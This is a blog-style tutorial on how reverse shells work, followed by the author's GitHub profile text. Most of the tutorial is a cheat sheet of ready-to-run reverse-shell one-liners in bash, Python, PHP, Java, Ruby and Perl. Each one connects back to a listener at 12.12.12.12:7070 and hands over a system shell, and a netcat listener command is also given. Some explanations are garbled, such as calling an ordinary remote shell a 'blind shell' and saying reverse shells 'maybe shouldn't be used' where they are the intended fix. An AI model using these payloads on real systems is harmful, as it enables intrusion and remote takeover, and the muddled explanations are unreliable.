[Cybersecurity] How do Reverse shells work?

Reverse Shells

How do reverse shells work?

To make a connection to a typical remote shell, a machine controlled by the attacker connects to the remote network host and it requests a shell connection.
This is called a blind shell

But what if the remote host is not directly accessible, like it has public IP or is protected by a firewall?

In this situation reverse shells maybe shouldn't be used, where the target machine initiates connection to the listening network host a shell is now established.

Reverse Shells Examples

To start you need a listener process on their system to listen the reverse shell connections incoming to their IP address, Eg, 12.12.12.12
On Linux, this can be as simple as one netcat command.

nc -lvnp 7070

The netcat listener will listen at port 7070. An attacker needs to execute the code to the listener. Many reverse shells needs programming langs
and systems.
Check out pentestmonkey’s Reverse Shell Cheat Sheet for more.
Codes are typically one-liners to allow injection using a single command.
While the examples below are for Linux and other Unix-like systems, many of them will also work on Windows if you change the command line interpreter call from /bin/sh -i to cmd.exe.

Bash Reverse Shell

If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell:

/bin/bash -i >& /dev/tcp/12.12.12.12/7070 0>&1

Python Reverse Shell

With Python continuing to gain popularity, there’s a good chance it’s available on the target server and can be used to execute a script like:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("12.12.12.12",7070));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP Reverse Shell

Most web servers will have PHP installed, and this too can provide a reverse shell vector (if the file descriptor &3 doesn’t work, you can try subsequent numbers):

php -r '$sock=fsockopen("12.12.12.12",7070);exec("/bin/sh -i <&3 >&3 2>&3");'

Java Reverse Shell

Java is likely to be available on application servers:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/12.12.12.12/7070;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ruby Reverse Shell

Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system:

ruby -rsocket -e'f=TCPSocket.open("12.12.12.12",7070).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Perl Reverse Shell

As with bash, a perl interpreter should be available on most Linux servers, so a perl command might be another way to obtain a reverse shell:

perl -e 'use Socket;$i="12.12.12.12";$p=7070;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Check out my Gist Here

Credits

Yuma-Tsushima07 / Yuma-Tsushima07

Readme file

Welcome to Yuma-Tsushima's Github page!

Visitor count

About Myself

Hello, my name is Yuma-Tsushima (frequently shortened to Yuma). I am an ambitious coder, and I enjoy coding in JavaScript (mainly). I also love making websites using HTML, CSS and (of course) JS! I started programming (self taught) at the age of 13. Originally, I came from the creative field ; I draw/sing/animate/make music.

Talents and Hobbies

I love drawing (I have been drawing all of my life). I play strategy games, I code and I do CTFs! I am also good at animation, making AMVs and image editing. My favourite game is Mindustry, followed by Flow Free and Sudoku. I love watching anime (I love Code Geass - I relate to Lelouch a lot) and I aspire to create my own anime!